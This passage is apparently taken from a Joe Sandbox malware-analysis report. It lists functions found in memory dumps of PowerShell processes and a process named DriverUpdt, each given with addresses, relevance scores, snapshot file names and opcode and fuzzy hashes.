                            Function 00007FF848F0A0FB Relevance: .0, Instructions: 38COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.2230485005.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848f00000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 39845ca1bb1d90fe467b5f66172c6f655081aaf2ab112ba971b9cf89625753a1
                            • Instruction ID: f2c913d7e464c5fb33117fda488b971395ea3608bb247b3a3f813cf779ee1cfe
                            • Opcode Fuzzy Hash: 39845ca1bb1d90fe467b5f66172c6f655081aaf2ab112ba971b9cf89625753a1
                            • Instruction Fuzzy Hash: E6F0593AA0CA8C4FCB81EF3C98681D47FE0FFA6211B0500BBD508C7161EB608848CBC1
                            Function 00007FF848FD43FA Relevance: .0, Instructions: 37COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.2231328339.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848fd0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9688a513bba34d0d6796eeaa4fbf2971401703dda120b550bbdf1730f1ce1553
                            • Instruction ID: 1ac74bfea5c94f2c79739ea4f97bebdacf17d076805861e8386c2ef8f220b082
                            • Opcode Fuzzy Hash: 9688a513bba34d0d6796eeaa4fbf2971401703dda120b550bbdf1730f1ce1553
                            • Instruction Fuzzy Hash: 46F09A31A0C5458FDB94EB5CA4448A8B7E0FF16360F4500B6E19EC70A3DB29ACA08B64

                            Non-executed Functions

                            Function 00007FF848F08BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2230485005.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848f00000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: O_^8$O_^<$O_^?$O_^J$O_^K$O_^N$O_^Q$O_^Y
                            • API String ID: 0-3814653101
                            • Opcode ID: 767dc838b8e3e9580db012fdc19fa58d9d18fd9b3128ba9e1fe4c8e4c2756401
                            • Instruction ID: a0f1b50350d84767e6235a92e2b28b9e38e345a374a4ee0607b987e7a50cf300
                            • Opcode Fuzzy Hash: 767dc838b8e3e9580db012fdc19fa58d9d18fd9b3128ba9e1fe4c8e4c2756401
                            • Instruction Fuzzy Hash: B4213473A2A5119AC202377CBC415D93790EF843BA74902F3E01DCF303DE1CA48B8694

                            Executed Functions

                            Function 00007FF848FF660A Relevance: 8.0, Strings: 6, Instructions: 458COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389881427.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (B$I$(B$I$(B$I$(B$I$(B$I$X7ov
                            • API String ID: 0-421575882
                            • Opcode ID: 4330de31d1ee325a6b5183168dcace537009961de4352c086563f787316e4d48
                            • Instruction ID: bafe2984886e5d5bbb9b5ccd5d389568b7d5328f74c2ebc298534aeb5b651dcf
                            • Opcode Fuzzy Hash: 4330de31d1ee325a6b5183168dcace537009961de4352c086563f787316e4d48
                            • Instruction Fuzzy Hash: 71D12232D0EA8A5FEB99AB2858155B57BE0EF59390F1801BFD10DCB1D3EE1CA805C355
                            Function 00007FF848FF4073 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389881427.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8>$I
                            • API String ID: 0-3301367642
                            • Opcode ID: 2e1bc05b80589c7ff97296965b25b8f1208c40f776623e4a52c38cf5234e2d0e
                            • Instruction ID: e4d7073d362606f3df1a9299fa2d5b438e5e939b4e2c96d852392e43f99d202e
                            • Opcode Fuzzy Hash: 2e1bc05b80589c7ff97296965b25b8f1208c40f776623e4a52c38cf5234e2d0e
                            • Instruction Fuzzy Hash: 6B51D032A0DA4A4FE79AEB2C541167577E2FFA5260F5801BBD24EC72D3DF18E8058349
                            Function 00007FF848FF40BF Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389881427.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8>$I
                            • API String ID: 0-3301367642
                            • Opcode ID: 278da6751fe91261a56711d148bcc05f29744061400f6ad98c8ee696241ae14b
                            • Instruction ID: 12d0400e416ac37e0e2d37e0aa67d99439e5a39f4d9e0ecd19d40dc1822a8a24
                            • Opcode Fuzzy Hash: 278da6751fe91261a56711d148bcc05f29744061400f6ad98c8ee696241ae14b
                            • Instruction Fuzzy Hash: 33218D32E0E98B4FE7AAEB2C545117466D1FF74290F5901BAD25DC72E2DF18EC058349
                            Function 00007FF848F2B238 Relevance: .3, Instructions: 317COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389012085.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 29cfbd13b2432f352145d94f3b59f910c20056ec4ea14ff01b09d3cba15b639a
                            • Instruction ID: 979f9043d8531c577a2a371be3ce9bfeb50abcf1cfbd9f5f36beec2bfc9c66ec
                            • Opcode Fuzzy Hash: 29cfbd13b2432f352145d94f3b59f910c20056ec4ea14ff01b09d3cba15b639a
                            • Instruction Fuzzy Hash: 7891593092CB898FE749EF18C4856B9BBE1FF95351F10017EC48AC7197DA25E846CB41
                            Function 00007FF848F29EF2 Relevance: .3, Instructions: 278COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389012085.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ec111fb182c628cd96aae436ba47584c89284db5c3d5ff85597976ae7571fa0e
                            • Instruction ID: 812f3d1aca105d0527ffe5d31cb93f2de79cd5666426efe9c481067eda851059
                            • Opcode Fuzzy Hash: ec111fb182c628cd96aae436ba47584c89284db5c3d5ff85597976ae7571fa0e
                            • Instruction Fuzzy Hash: 1C714C77E0D9958FE756EB3CB8610E57B60EF11BB6F0802B7C08C8A0C3FE1A58568645
                            Function 00007FF848F29FD3 Relevance: .2, Instructions: 183COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389012085.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 77a32c4a09b0129fafd3178c3875952cbd233b0f66c414de6d06b03f4baee1d7
                            • Instruction ID: 8495b34376bea0c0644d1111bc63be8adc6a38f3005430a765161036812551f8
                            • Opcode Fuzzy Hash: 77a32c4a09b0129fafd3178c3875952cbd233b0f66c414de6d06b03f4baee1d7
                            • Instruction Fuzzy Hash: CE411777D0DDD68EE31AEB7CB8510E53B60EF11BA2F0901B7D04C860D3EE266C868645
                            Function 00007FF848F29768 Relevance: .1, Instructions: 126COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389012085.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0fb4a881ee75974651ad8466b4fd8a63e3bc320d8cbc39d310ef4da260d59789
                            • Instruction ID: e0304ef855928b6a1478f1cf8d90df38bc2e498a78f36796cbf49991d295dbb0
                            • Opcode Fuzzy Hash: 0fb4a881ee75974651ad8466b4fd8a63e3bc320d8cbc39d310ef4da260d59789
                            • Instruction Fuzzy Hash: 4231083191CB489FDB18DF5CA8066F97BE0FB99711F00422FE449D3691CB31A8568BC2
                            Function 00007FF848E0ED40 Relevance: .1, Instructions: 124COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.2387932928.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848e0d000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e56dd9f59f38c4bff80c5e3811a87d32763e66047f4710d630b533fa9131efdf
                            • Instruction ID: 8e3462d11a1082b47829a3748a4bd790b38563e57408114a714203d6ac59530d
                            • Opcode Fuzzy Hash: e56dd9f59f38c4bff80c5e3811a87d32763e66047f4710d630b533fa9131efdf
                            • Instruction Fuzzy Hash: 8C41E37180DBC44FE7569B3898519523FF0FF57260B1905EFD088CB1A3D629A84AC7A2
                            Function 00007FF848F233B5 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389012085.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                            • Instruction ID: b81149d342438cc37704c2a90a5bc61e4b8c38b5d9d18ebcc6d248958a2491c8
                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                            • Instruction Fuzzy Hash: 6A01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E892CB46
                            Function 00007FF848FF43FA Relevance: .0, Instructions: 37COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389881427.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f9ccbb1a89d9a01ffad5dbcfb3e7d97c3b85813afb6936d4a516a6d6f91dfa31
                            • Instruction ID: 7e1c3ae5898979a2193a2b7b82a81bbc69854c81746028a451958890e6b21308
                            • Opcode Fuzzy Hash: f9ccbb1a89d9a01ffad5dbcfb3e7d97c3b85813afb6936d4a516a6d6f91dfa31
                            • Instruction Fuzzy Hash: 41F09A31A0C5458FDB54EB5CA4448A8B7E0FF15360F4500B6E15DD71A3DB2AAC608764

                            Non-executed Functions

                            Function 00007FF848F28995 Relevance: 5.2, Strings: 4, Instructions: 160COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389012085.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: M_^$M_^$M_^$M_^
                            • API String ID: 0-1397233021
                            • Opcode ID: 2c1b44a8a4f5a740268b0ac3a43ec9858c1ddf7caaa8c2ab8f71ccf376b26791
                            • Instruction ID: a13c0346b16604232fe1c41bc24cfdf77232e2f572919fcd7528b79ab2eeea7a
                            • Opcode Fuzzy Hash: 2c1b44a8a4f5a740268b0ac3a43ec9858c1ddf7caaa8c2ab8f71ccf376b26791
                            • Instruction Fuzzy Hash: D941D473E1E6D25FE34A972868690E53FA0EF12794B4D02F6C0C88B0D3EE1D58079756
                            Function 00007FF848F28BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389012085.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: M_^4$M_^7$M_^F$M_^J
                            • API String ID: 0-622050427
                            • Opcode ID: 90f68846e37aad839527a385a5ee575dc6928c014df719ce68c663142915cb22
                            • Instruction ID: 4b251d57f47bb37acb7270bcb3fcd5e7a9f7ff78876cdeb73e676b5544b6a454
                            • Opcode Fuzzy Hash: 90f68846e37aad839527a385a5ee575dc6928c014df719ce68c663142915cb22
                            • Instruction Fuzzy Hash: 6C213B7761A465DED3427B7DB8045DA3750DF942B8B8503B2E098CF083FE1C70868AD4

                            Executed Functions

                            Function 00007FF848FF6605 Relevance: 7.9, Strings: 6, Instructions: 435COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2593745197.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (B#I$(B#I$(B#I$(B#I$(B#I$X7q0
                            • API String ID: 0-1954526268
                            • Opcode ID: 4111b2f0ebe2ea133612e8d69e83d3acf7a60913e04266520c01efd57d83faf5
                            • Instruction ID: 3560bc6cd64c544b8a376166c2e23945fefc08bef354c5ac2056f47564d8e058
                            • Opcode Fuzzy Hash: 4111b2f0ebe2ea133612e8d69e83d3acf7a60913e04266520c01efd57d83faf5
                            • Instruction Fuzzy Hash: 63D13131D0EA8A5FE795AB2858145B5BBA0EF1A390F1801FFD54DCB1D3EE1CA805C355
                            Function 00007FF848FF4073 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2593745197.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8>#I
                            • API String ID: 0-2340899229
                            • Opcode ID: e7ddf977e966041b6a467433a3cda1151263c9d8c9d66ad7519a1f54c2e410fe
                            • Instruction ID: da1521020855984667f9cb1daf2c9894b4c12a71e4343c3942b85399d8f17168
                            • Opcode Fuzzy Hash: e7ddf977e966041b6a467433a3cda1151263c9d8c9d66ad7519a1f54c2e410fe
                            • Instruction Fuzzy Hash: 9451D332A0DA4A4FE79AEB2C541167577E1FFA5260F5801BBD20EC72D3DF18E8058249
                            Function 00007FF848FF40BF Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2593745197.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8>#I
                            • API String ID: 0-2340899229
                            • Opcode ID: 9d925bb9d67d1e69e3df169ff777b418f291891dc2c0aa46bec505e27b1b0d63
                            • Instruction ID: f02cd32eac3361619fc3a25a52dcf6e2d6e6e850901e92f66262d6ef5706cda5
                            • Opcode Fuzzy Hash: 9d925bb9d67d1e69e3df169ff777b418f291891dc2c0aa46bec505e27b1b0d63
                            • Instruction Fuzzy Hash: 71218F32D0EA8B4FE7AAEB2C545117466D1FF742A0F5901BBD21DC72E2DF18EC448649
                            Function 00007FF848F29D38 Relevance: .2, Instructions: 234COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2592588092.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ffa088625b1d43d9bab202108a09fcb8e07054148ab9d7c1734f1bd983910a1c
                            • Instruction ID: 18f81c8fbbdf5c50e928662e272ac3d91e1d7c8c8be0de030beb6ea50cda6b73
                            • Opcode Fuzzy Hash: ffa088625b1d43d9bab202108a09fcb8e07054148ab9d7c1734f1bd983910a1c
                            • Instruction Fuzzy Hash: FE01D43190DA898FDB46EF2868196A8BFE0FF25340F4401EBD4888B0A2E7259944CB81
                            Function 00007FF848F29780 Relevance: .1, Instructions: 129COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2592588092.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1a5a2cf6ab8ea6d3bab45f4fdc2bed4a56df9e5b23df791444c04f503d2f5191
                            • Instruction ID: 519f3687db648b76b856ae5cbe7d921de0f0c1c585903aeccb132e8f673d3fde
                            • Opcode Fuzzy Hash: 1a5a2cf6ab8ea6d3bab45f4fdc2bed4a56df9e5b23df791444c04f503d2f5191
                            • Instruction Fuzzy Hash: 3531073191CB888FDB19DB5CAC066A97BE0FB99711F00426FE049D3692CA75A855CBC2
                            Function 00007FF848E0EB80 Relevance: .1, Instructions: 126COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2591149897.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848e0d000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c62964d1fbe648a406213d5beb7a6e0d78886a7bb79ad98649893ce273719986
                            • Instruction ID: 5ac3c116901b78130578f238292eefe54d9531fad01a29c31895653af228d856
                            • Opcode Fuzzy Hash: c62964d1fbe648a406213d5beb7a6e0d78886a7bb79ad98649893ce273719986
                            • Instruction Fuzzy Hash: 8F41F47180DBC54FE7669B2898459623FF0FF53260F1505EFD089CB1A3E629A806CB92
                            Function 00007FF848F2A64C Relevance: .1, Instructions: 99COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2592588092.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 98126a9d9838422376c874fd7716301160e537697cfcf81b16bc4a2083b3ae7b
                            • Instruction ID: 995747037ee485c6b3a2fd380e252d93129a0bcfc5341b9ea6f429e0300a92c5
                            • Opcode Fuzzy Hash: 98126a9d9838422376c874fd7716301160e537697cfcf81b16bc4a2083b3ae7b
                            • Instruction Fuzzy Hash: 3C21063090CB8C8FEB59DBAC984A7E97FE0EB96320F04416BD048C3192DB749446CB92
                            Function 00007FF848F233B5 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2592588092.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                            • Instruction ID: b81149d342438cc37704c2a90a5bc61e4b8c38b5d9d18ebcc6d248958a2491c8
                            • Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                            • Instruction Fuzzy Hash: 6A01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E892CB46
                            Function 00007FF848FF43FA Relevance: .0, Instructions: 37COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2593745197.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8420699248bc57d67e197454f1966028d2ec4513137532cf268e95752a1a40b7
                            • Instruction ID: d12716fbd96981dca435260a40d5d99fcb0876254634c2c112dd5278a36ce8c9
                            • Opcode Fuzzy Hash: 8420699248bc57d67e197454f1966028d2ec4513137532cf268e95752a1a40b7
                            • Instruction Fuzzy Hash: 19F09A31A0D5458FDB54EB1CA4448B8B7E0FF15360F5900B7E159D71A3DB2AAC608764
                            Function 00007FF848F2A2C8 Relevance: .0, Instructions: 27COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2592588092.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2e1996b132e0f462bdfe1df46b46a43e80c0ef80fe2cd5e880efb2c4b77fe918
                            • Instruction ID: bea08552ecbdabe64bb7750a8a63a14747958bdd45605a57389dd10df55930a7
                            • Opcode Fuzzy Hash: 2e1996b132e0f462bdfe1df46b46a43e80c0ef80fe2cd5e880efb2c4b77fe918
                            • Instruction Fuzzy Hash: 7EE01A75918A4C8FCB49EF28D8599E97BA0FF69311B05029BE80DC7160EB719958CBC2

                            Non-executed Functions

                            Function 00007FF848F28BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2592588092.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                            • API String ID: 0-962139525
                            • Opcode ID: b260b10dca75ad829fffd06b38cce263ed1d75634052bcd1b6c8a74d1e912534
                            • Instruction ID: 7fd3566e5afb083c6e6401c0847751e720ad71e5f9896b647dd2248b4652e339
                            • Opcode Fuzzy Hash: b260b10dca75ad829fffd06b38cce263ed1d75634052bcd1b6c8a74d1e912534
                            • Instruction Fuzzy Hash: FD21D473A29525DAD242366CB8419DD7790EF543B978603F3E028CF193EE1CA48B8A95

                            Executed Functions

                            Function 00007FF848F116E9 Relevance: .7, Instructions: 703COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f6d3ebe5aafe33dbcb88ef10a58cc34cdcb20bee81395586457ccf029b89d6be
                            • Instruction ID: 3b412a804e4c07eb97908daf3062bd2d6cc837d34eeba538c1dde924525aafe1
                            • Opcode Fuzzy Hash: f6d3ebe5aafe33dbcb88ef10a58cc34cdcb20bee81395586457ccf029b89d6be
                            • Instruction Fuzzy Hash: 8C22B130A6DA595FE798FB2884997B976E2FF88754F800579E40EC32C3DF28AC418745
                            Function 00007FF848F10E5E Relevance: .3, Instructions: 283COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 93f0e2997c56e0301d12ef4900b193f81fe75b9b7a2cabc13a4f2474ba19131d
                            • Instruction ID: 592779e538a1f41370705213fa7413a9371c4134998d1f6a8d04fc6308e06926
                            • Opcode Fuzzy Hash: 93f0e2997c56e0301d12ef4900b193f81fe75b9b7a2cabc13a4f2474ba19131d
                            • Instruction Fuzzy Hash: 1E710922A1E6965EE352B37C64551FA2FA1EF86774F0842BBD4CCCE093DE0C58878365
                            Function 00007FF848F120C1 Relevance: .2, Instructions: 207COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 096a0279456f85cf526d09df2e8247a42c102aeab69a5e8b5caaef80a3103d80
                            • Instruction ID: 8c30c5e89f9d39cbaf8522dd38e673b1fa8d4bc7cc8c0695463a73139e8260f5
                            • Opcode Fuzzy Hash: 096a0279456f85cf526d09df2e8247a42c102aeab69a5e8b5caaef80a3103d80
                            • Instruction Fuzzy Hash: 8651F020A5E6C55FD786EBB85864275BFE1EF87369F0801FAE089C71D3DE180806C356
                            Function 00007FF848F107F2 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;O_$<O_^
                            • API String ID: 0-3431308889
                            • Opcode ID: baa5ab3dec3984ca56e0bfe911c1f960c214566be5a0914367f790b0c04aeb14
                            • Instruction ID: 3ce9c4ed5f51dc1d6fcba5258127e42062e0f59d15f8381b10bd8e42c10bd93d
                            • Opcode Fuzzy Hash: baa5ab3dec3984ca56e0bfe911c1f960c214566be5a0914367f790b0c04aeb14
                            • Instruction Fuzzy Hash: 45510532A9A1569FE340FB6CA4D11E93BB0FF80368F904176D44CCB393DE2C68458B94
                            Function 00007FF848F111F2 Relevance: 1.8, Strings: 1, Instructions: 584COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID: 2O_^
                            • API String ID: 0-2974816419
                            • Opcode ID: 39b862359a0fc3f474f6c43042a1140fa1ad6c64e4c54a0e2586535868cad3c4
                            • Instruction ID: c044383c1eac76f006684d93fcdc9b59905e3f09148ca34fbe0e6546266f735f
                            • Opcode Fuzzy Hash: 39b862359a0fc3f474f6c43042a1140fa1ad6c64e4c54a0e2586535868cad3c4
                            • Instruction Fuzzy Hash: 3151E532D1E5969EE741B77CA8611EA7BB0FF82365F0801B6D188DB1D3DE1C184A87A4
                            Function 00007FF848F111F0 Relevance: 1.8, Strings: 1, Instructions: 580COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID: 2O_^
                            • API String ID: 0-2974816419
                            • Opcode ID: 8278619ec01ffc9ee758f403e801557d99a4d449062f51fd95b85c85f7c91947
                            • Instruction ID: b851975c0400df489d7cd6d61e202ce4bb95346016145c079fc70b2caeedc2f5
                            • Opcode Fuzzy Hash: 8278619ec01ffc9ee758f403e801557d99a4d449062f51fd95b85c85f7c91947
